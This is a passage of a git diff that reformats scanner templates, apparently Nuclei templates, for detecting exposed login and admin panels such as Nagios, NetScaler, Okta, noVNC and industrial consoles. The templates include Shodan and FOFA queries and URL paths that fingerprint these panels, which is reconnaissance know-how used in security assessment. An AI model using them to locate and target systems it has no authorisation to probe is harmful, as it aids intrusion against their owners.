b/http/exposed-panels/mystrom-panel.yaml index 683341b6a9..2fb7004a6a 100644 --- a/http/exposed-panels/mystrom-panel.yaml +++ b/http/exposed-panels/mystrom-panel.yaml @@ -7,11 +7,11 @@ info: description: Mystrom panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"myStrom" tags: panel,mystrom,iot @@ -29,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/nagios-panel.yaml b/http/exposed-panels/nagios-panel.yaml index 3bf6013e55..67d9cdc1f7 100644 --- a/http/exposed-panels/nagios-panel.yaml +++ b/http/exposed-panels/nagios-panel.yaml @@ -7,11 +7,11 @@ info: description: Nagios login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"nagios" tags: panel,nagios @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/nagios3" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/nagios-xi-panel.yaml b/http/exposed-panels/nagios-xi-panel.yaml index bd0592d19c..039af3a04b 100644 --- a/http/exposed-panels/nagios-xi-panel.yaml +++ b/http/exposed-panels/nagios-xi-panel.yaml @@ -7,11 +7,11 @@ info: description: Nagios XI login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"Nagios XI" tags: panel,nagios,nagios-xi @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/nagvis-panel.yaml b/http/exposed-panels/nagvis-panel.yaml index 8a4cca65f8..35ee175d0f 100644 --- a/http/exposed-panels/nagvis-panel.yaml +++ b/http/exposed-panels/nagvis-panel.yaml @@ -7,11 +7,11 @@ info: description: NagVis login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"NagVis" tags: panel,nagvis @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/navicat-server-panel.yaml b/http/exposed-panels/navicat-server-panel.yaml index 73214d4591..99774dd7cc 100644 --- a/http/exposed-panels/navicat-server-panel.yaml +++ b/http/exposed-panels/navicat-server-panel.yaml @@ -7,10 +7,10 @@ info: description: | Navicat On-Prem Server is an on-premise solution that provides you with the option to host a cloud environment for storing Navicat objects internally at your location. In our On-Prem environment, you can enjoy complete control over your system and maintain 100% privacy. It is secure and reliable that allow you to maintain a level of control that the cloud often cannot. metadata: - fofa-query: icon_hash="598296063" + verified: true max-request: 2 shodan-query: http.favicon.hash:598296063 - verified: true + fofa-query: icon_hash="598296063" tags: panel,navicat,on-prem,detect http: @@ -22,6 +22,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/ncentral-panel.yaml b/http/exposed-panels/ncentral-panel.yaml index 3a3381b325..8a1d9edf3b 100644 --- a/http/exposed-panels/ncentral-panel.yaml +++ b/http/exposed-panels/ncentral-panel.yaml @@ -7,11 +7,11 @@ info: description: N-central login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"N-central Login" tags: panel,n-central diff --git a/http/exposed-panels/nconf-panel.yaml b/http/exposed-panels/nconf-panel.yaml index a524f212d8..67ebb09351 100644 --- a/http/exposed-panels/nconf-panel.yaml +++ b/http/exposed-panels/nconf-panel.yaml @@ -7,11 +7,11 @@ info: description: NConf login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"nconf" tags: panel,nconf diff --git a/http/exposed-panels/neo4j-browser.yaml b/http/exposed-panels/neo4j-browser.yaml index bf63f3be14..a32aecaa84 100644 --- a/http/exposed-panels/neo4j-browser.yaml +++ b/http/exposed-panels/neo4j-browser.yaml @@ -7,7 +7,7 @@ info: description: The Neo4j Browser has been detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/neobox-panel.yaml b/http/exposed-panels/neobox-panel.yaml index 522d67cab7..4031a8c72c 100644 --- a/http/exposed-panels/neobox-panel.yaml +++ b/http/exposed-panels/neobox-panel.yaml @@ -7,11 +7,11 @@ info: description: Neobox Web Server login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"NeoboxUI" fofa-query: app="neobox-Web-Server" tags: panel,neobox,webserver diff --git a/http/exposed-panels/neos-panel.yaml b/http/exposed-panels/neos-panel.yaml index 281c7de7ab..46adb397bc 100644 --- a/http/exposed-panels/neos-panel.yaml +++ b/http/exposed-panels/neos-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/neos/neos/blob/master/Configuration/Routes.yaml classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,neos,cms,login metadata: max-request: 1 + tags: panel,neos,cms,login http: - method: GET @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/nessus-panel.yaml b/http/exposed-panels/nessus-panel.yaml index 97813ee2ef..5a6c326fdd 100644 --- a/http/exposed-panels/nessus-panel.yaml +++ b/http/exposed-panels/nessus-panel.yaml @@ -7,11 +7,11 @@ info: description: Tenable Nessus panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Nessus" tags: panel,nessus diff --git a/http/exposed-panels/netdata-dashboard-detected.yaml b/http/exposed-panels/netdata-dashboard-detected.yaml index d1c6e91aea..8957fe0646 100644 --- a/http/exposed-panels/netdata-dashboard-detected.yaml +++ b/http/exposed-panels/netdata-dashboard-detected.yaml @@ -7,7 +7,7 @@ info: description: Netdata Dashboard panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/netdata-panel.yaml b/http/exposed-panels/netdata-panel.yaml index f1840e2ee7..cd27e0c5eb 100644 --- a/http/exposed-panels/netdata-panel.yaml +++ b/http/exposed-panels/netdata-panel.yaml @@ -10,7 +10,7 @@ info: - https://github.com/netdata/netdata classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/netflix-conductor-ui.yaml b/http/exposed-panels/netflix-conductor-ui.yaml index dc16e47332..fbdcb6d052 100644 --- a/http/exposed-panels/netflix-conductor-ui.yaml +++ b/http/exposed-panels/netflix-conductor-ui.yaml @@ -7,7 +7,7 @@ info: description: Netflix Conductor UI panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: status diff --git a/http/exposed-panels/netgear-version-detect.yaml b/http/exposed-panels/netgear-version-detect.yaml index 9d5e71be68..06727d4c6f 100644 --- a/http/exposed-panels/netgear-version-detect.yaml +++ b/http/exposed-panels/netgear-version-detect.yaml @@ -7,11 +7,11 @@ info: description: NETGEAR router panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,router,netgear metadata: max-request: 1 + tags: panel,router,netgear http: - method: GET diff --git a/http/exposed-panels/netis-router.yaml b/http/exposed-panels/netis-router.yaml index 82cd058540..d6fa5980b6 100644 --- a/http/exposed-panels/netis-router.yaml +++ b/http/exposed-panels/netis-router.yaml @@ -9,11 +9,11 @@ info: - https://www.tacnetsol.com/blog/cve-2019-8985-rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,login,netis,router metadata: max-request: 1 + tags: panel,login,netis,router http: - method: GET diff --git a/http/exposed-panels/netlify-cms.yaml b/http/exposed-panels/netlify-cms.yaml index b7d716623c..2d8ef7c421 100644 --- a/http/exposed-panels/netlify-cms.yaml +++ b/http/exposed-panels/netlify-cms.yaml @@ -7,11 +7,11 @@ info: description: Netlify CMS admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,netlify metadata: max-request: 1 + tags: panel,netlify http: - method: GET @@ -23,6 +23,7 @@ http: - type: status status: - 200 + - type: word words: - "Netlify CMS" diff --git a/http/exposed-panels/netris-dashboard-panel.yaml b/http/exposed-panels/netris-dashboard-panel.yaml index be8a5e6a67..21512bedf0 100644 --- a/http/exposed-panels/netris-dashboard-panel.yaml +++ b/http/exposed-panels/netris-dashboard-panel.yaml @@ -7,11 +7,11 @@ info: description: Netris Dashboard panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Netris Dashboard" tags: panel,netris diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index 0d2f3cab07..0badc2811d 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -9,16 +9,17 @@ info: - https://www.exploit-db.com/ghdb/6898 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,netscaler,login,edb metadata: max-request: 1 + tags: panel,netscaler,login,edb http: - method: GET path: - '{{BaseURL}}/logon/LogonPoint/tmindex.html' + matchers: - type: word words: diff --git a/http/exposed-panels/netscaler-gateway.yaml b/http/exposed-panels/netscaler-gateway.yaml index bf9cd10ae6..7dc6c3274d 100644 --- a/http/exposed-panels/netscaler-gateway.yaml +++ b/http/exposed-panels/netscaler-gateway.yaml @@ -5,19 +5,20 @@ info: author: joeldeleep severity: info description: Citrix NetScaler is an application delivery controller that improves the delivery speed and quality of applications to an end user. + remediation: Ensure proper access. reference: - https://stack.watch/product/citrix/netscaler-gateway/ classification: cwe-id: CWE-200 - remediation: Ensure proper access. - tags: panel,netscaler metadata: max-request: 1 + tags: panel,netscaler http: - method: GET path: - "{{BaseURL}}/vpn/index.html" + matchers: - type: word words: diff --git a/http/exposed-panels/netsparker-panel.yaml b/http/exposed-panels/netsparker-panel.yaml index 5318387e26..34bf20dbeb 100644 --- a/http/exposed-panels/netsparker-panel.yaml +++ b/http/exposed-panels/netsparker-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.invicti.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Sign in to Netsparker Enterprise" tags: panel,netsparker diff --git a/http/exposed-panels/netsus-server-login.yaml b/http/exposed-panels/netsus-server-login.yaml index 2ecfe45d5c..0bd89d99e6 100644 --- a/http/exposed-panels/netsus-server-login.yaml +++ b/http/exposed-panels/netsus-server-login.yaml @@ -7,7 +7,7 @@ info: description: NetSUS Server login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/nginx-admin-panel.yaml b/http/exposed-panels/nginx-admin-panel.yaml index c0cd7ed99d..17250bf861 100644 --- a/http/exposed-panels/nginx-admin-panel.yaml +++ b/http/exposed-panels/nginx-admin-panel.yaml @@ -9,11 +9,11 @@ info: - https://ng-admin.jslsolucoes.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"nginx admin manager" tags: panel,nginx,admin diff --git a/http/exposed-panels/nginx-proxy-manager.yaml b/http/exposed-panels/nginx-proxy-manager.yaml index 410026e89f..ad5936504e 100644 --- a/http/exposed-panels/nginx-proxy-manager.yaml +++ b/http/exposed-panels/nginx-proxy-manager.yaml @@ -7,7 +7,7 @@ info: description: Nginx Proxy Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,12 +24,14 @@ http: - type: word words: - 'Nginx Proxy Manager' + - type: status status: - 200 + extractors: - type: regex part: body group: 1 regex: - - '"page" id="login" data\-version="([0-9.]+)">' \ No newline at end of file + - '"page" id="login" data\-version="([0-9.]+)">' diff --git a/http/exposed-panels/nginx-ui-dashboard.yaml b/http/exposed-panels/nginx-ui-dashboard.yaml index 17eca04861..ba26633f98 100644 --- a/http/exposed-panels/nginx-ui-dashboard.yaml +++ b/http/exposed-panels/nginx-ui-dashboard.yaml @@ -9,11 +9,11 @@ info: - https://github.com/schenkd/nginx-ui classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"nginx ui" tags: panel,nginx,exposure diff --git a/http/exposed-panels/noescape-login.yaml b/http/exposed-panels/noescape-login.yaml index 15b599f1d7..a6b55de6fe 100644 --- a/http/exposed-panels/noescape-login.yaml +++ b/http/exposed-panels/noescape-login.yaml @@ -7,11 +7,11 @@ info: description: NoEscape login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"NoEscape - Login" tags: panel,noescape diff --git a/http/exposed-panels/nordex-wind-farm-portal.yaml b/http/exposed-panels/nordex-wind-farm-portal.yaml index a6b2a54513..c9f7ea1e33 100644 --- a/http/exposed-panels/nordex-wind-farm-portal.yaml +++ b/http/exposed-panels/nordex-wind-farm-portal.yaml @@ -9,11 +9,11 @@ info: - https://www.nordex-online.com/en/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Nordex Control" tags: panel,nordex,iot @@ -24,6 +24,7 @@ http: redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/normhost-backup-server-manager.yaml b/http/exposed-panels/normhost-backup-server-manager.yaml index b8553e0311..65f2a48c08 100644 --- a/http/exposed-panels/normhost-backup-server-manager.yaml +++ b/http/exposed-panels/normhost-backup-server-manager.yaml @@ -7,11 +7,11 @@ info: description: Normhost Backup server manager panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Normhost Backup server manager" tags: panel,normhost diff --git a/http/exposed-panels/novnc-login-panel.yaml b/http/exposed-panels/novnc-login-panel.yaml index 206941e98e..f9e2ffe6d6 100644 --- a/http/exposed-panels/novnc-login-panel.yaml +++ b/http/exposed-panels/novnc-login-panel.yaml @@ -7,11 +7,11 @@ info: description: noVNC login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"noVNC" tags: panel,novnc @@ -24,9 +24,9 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/nozomi-panel.yaml b/http/exposed-panels/nozomi-panel.yaml index 288e443b6f..158b3825d3 100644 --- a/http/exposed-panels/nozomi-panel.yaml +++ b/http/exposed-panels/nozomi-panel.yaml @@ -7,11 +7,11 @@ info: description: Nozomi Guardian login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Please Login | Nozomi Networks Console" tags: panel,nozomi diff --git a/http/exposed-panels/np-data-cache.yaml b/http/exposed-panels/np-data-cache.yaml index 575c239feb..8df29c91e1 100644 --- a/http/exposed-panels/np-data-cache.yaml +++ b/http/exposed-panels/np-data-cache.yaml @@ -7,11 +7,11 @@ info: description: NP Data Cache panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"NP Data Cache" tags: np,panel,cache diff --git a/http/exposed-panels/nport-web-console.yaml b/http/exposed-panels/nport-web-console.yaml index 30934943a6..793e80f94e 100644 --- a/http/exposed-panels/nport-web-console.yaml +++ b/http/exposed-panels/nport-web-console.yaml @@ -9,11 +9,11 @@ info: - https://www.moxa.com/en/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"NPort Web Console" tags: panel,nport diff --git a/http/exposed-panels/nsq-admin-panel.yaml b/http/exposed-panels/nsq-admin-panel.yaml index 923b74f180..3a407d22d5 100644 --- a/http/exposed-panels/nsq-admin-panel.yaml +++ b/http/exposed-panels/nsq-admin-panel.yaml @@ -12,8 +12,8 @@ info: cvss-score: 6.5 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"nsqadmin" tags: nsq,admin,panel,exposure diff --git a/http/exposed-panels/nutanix-web-console-login.yaml b/http/exposed-panels/nutanix-web-console-login.yaml index 0a5c3355a1..8ab7faba3c 100644 --- a/http/exposed-panels/nutanix-web-console-login.yaml +++ b/http/exposed-panels/nutanix-web-console-login.yaml @@ -7,11 +7,11 @@ info: description: Nutanix Web Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,nutanix,login metadata: max-request: 1 + tags: panel,nutanix,login http: - method: GET @@ -23,6 +23,7 @@ http: - type: word words: - "Nutanix Web Console" + - type: status status: - 200 diff --git a/http/exposed-panels/nuxeo-platform-panel.yaml b/http/exposed-panels/nuxeo-platform-panel.yaml index 3a3a316d42..005078c786 100644 --- a/http/exposed-panels/nuxeo-platform-panel.yaml +++ b/http/exposed-panels/nuxeo-platform-panel.yaml @@ -7,13 +7,14 @@ info: description: Nuxeo Platform login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Nuxeo Platform" tags: panel,nuxeo + http: - method: GET path: diff --git a/http/exposed-panels/nzbget-panel.yaml b/http/exposed-panels/nzbget-panel.yaml index 73663bce66..6629116b91 100644 --- a/http/exposed-panels/nzbget-panel.yaml +++ b/http/exposed-panels/nzbget-panel.yaml @@ -7,11 +7,11 @@ info: description: NZBGet login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"NZBGet" tags: panel,nzbget diff --git a/http/exposed-panels/o2-easy-panel.yaml b/http/exposed-panels/o2-easy-panel.yaml index 364ba9cf53..65d1212157 100644 --- a/http/exposed-panels/o2-easy-panel.yaml +++ b/http/exposed-panels/o2-easy-panel.yaml @@ -7,11 +7,11 @@ info: description: O2 router setup panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"O2 Easy Setup" tags: panel,o2,easy,iot,router diff --git a/http/exposed-panels/ocomon-panel.yaml b/http/exposed-panels/ocomon-panel.yaml index 83454f6d6e..ae0acc3bb5 100644 --- a/http/exposed-panels/ocomon-panel.yaml +++ b/http/exposed-panels/ocomon-panel.yaml @@ -7,14 +7,14 @@ info: description: a tiny helpdesk system written in php reference: - https://sourceforge.net/projects/ocomonphp/ - metadata: - max-request: 1 - verified: true - shodan-query: http.html:"OcoMon" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"OcoMon" tags: panel,ocomon,oss http: @@ -24,9 +24,9 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: regex regex: - '(?i)(OcoMon)' diff --git a/http/exposed-panels/ocs-inventory-login.yaml b/http/exposed-panels/ocs-inventory-login.yaml index f1cb36ba80..d5e0378626 100644 --- a/http/exposed-panels/ocs-inventory-login.yaml +++ b/http/exposed-panels/ocs-inventory-login.yaml @@ -7,11 +7,11 @@ info: description: OCS Inventory login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"OCS Inventory" fofa-query: title="OCS Inventory" tags: ocs-inventory,panel @@ -25,6 +25,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/octoprint-login.yaml b/http/exposed-panels/octoprint-login.yaml index 5b82852801..42d056f7b5 100644 --- a/http/exposed-panels/octoprint-login.yaml +++ b/http/exposed-panels/octoprint-login.yaml @@ -7,11 +7,11 @@ info: description: OctoPrint login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: octoprint,panel metadata: max-request: 2 + tags: octoprint,panel http: - method: GET @@ -27,4 +27,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/odoo-database-manager.yaml b/http/exposed-panels/odoo-database-manager.yaml index 9fa4ba6883..9886e7d1de 100644 --- a/http/exposed-panels/odoo-database-manager.yaml +++ b/http/exposed-panels/odoo-database-manager.yaml @@ -6,8 +6,8 @@ info: severity: low description: Odoo database manager was discovered. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Odoo" tags: panel,odoo,backup @@ -26,4 +26,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/odoo-panel.yaml b/http/exposed-panels/odoo-panel.yaml index 0d9579e96f..b55e487559 100644 --- a/http/exposed-panels/odoo-panel.yaml +++ b/http/exposed-panels/odoo-panel.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Odoo" tags: login,panel,odoo diff --git a/http/exposed-panels/officekeeper-admin-login.yaml b/http/exposed-panels/officekeeper-admin-login.yaml index b0aab9ccd6..26cefcca18 100644 --- a/http/exposed-panels/officekeeper-admin-login.yaml +++ b/http/exposed-panels/officekeeper-admin-login.yaml @@ -7,11 +7,11 @@ info: description: OfficeKeeper admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:-800060828 tags: officekeeper,dlp,panel diff --git a/http/exposed-panels/oipm-detect.yaml b/http/exposed-panels/oipm-detect.yaml index 7a9e798126..b8919d9488 100644 --- a/http/exposed-panels/oipm-detect.yaml +++ b/http/exposed-panels/oipm-detect.yaml @@ -5,19 +5,20 @@ info: author: nodauf severity: info description: One Identity Password Manager is a secure password manager that gives enterprises control over password management, policies, and automated reset functions. + remediation: Ensure proper access. reference: - https://www.oneidentity.com/techbrief/security-guide-for-password-manager821177/ classification: cwe-id: CWE-200 - remediation: Ensure proper access. - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET path: - '{{BaseURL}}/PMUser/' + matchers: - type: word words: diff --git a/http/exposed-panels/oki-data.yaml b/http/exposed-panels/oki-data.yaml index 87bb849081..62fd8ff07e 100644 --- a/http/exposed-panels/oki-data.yaml +++ b/http/exposed-panels/oki-data.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/5937 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,oki,edb metadata: max-request: 1 + tags: panel,oki,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'Oki Data Corporation' + - type: status status: - 200 diff --git a/http/exposed-panels/okiko-sfiler-portal.yaml b/http/exposed-panels/okiko-sfiler-portal.yaml index df1e16f32b..2af57e2456 100644 --- a/http/exposed-panels/okiko-sfiler-portal.yaml +++ b/http/exposed-panels/okiko-sfiler-portal.yaml @@ -7,7 +7,7 @@ info: description: OKIOK S-Filer Portal login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/okta-panel.yaml b/http/exposed-panels/okta-panel.yaml index 7ff1815c11..a5c2c14fa5 100644 --- a/http/exposed-panels/okta-panel.yaml +++ b/http/exposed-panels/okta-panel.yaml @@ -7,7 +7,7 @@ info: description: Okta login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/olt-web-interface.yaml b/http/exposed-panels/olt-web-interface.yaml index eccfda668b..9047cebbe8 100644 --- a/http/exposed-panels/olt-web-interface.yaml +++ b/http/exposed-panels/olt-web-interface.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/8020 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"OLT Web Management Interface" tags: edb,panel,olt diff --git a/http/exposed-panels/omniampx-panel.yaml b/http/exposed-panels/omniampx-panel.yaml index ea6ddc819e..68f35e204c 100644 --- a/http/exposed-panels/omniampx-panel.yaml +++ b/http/exposed-panels/omniampx-panel.yaml @@ -7,11 +7,11 @@ info: description: Omnia MPX 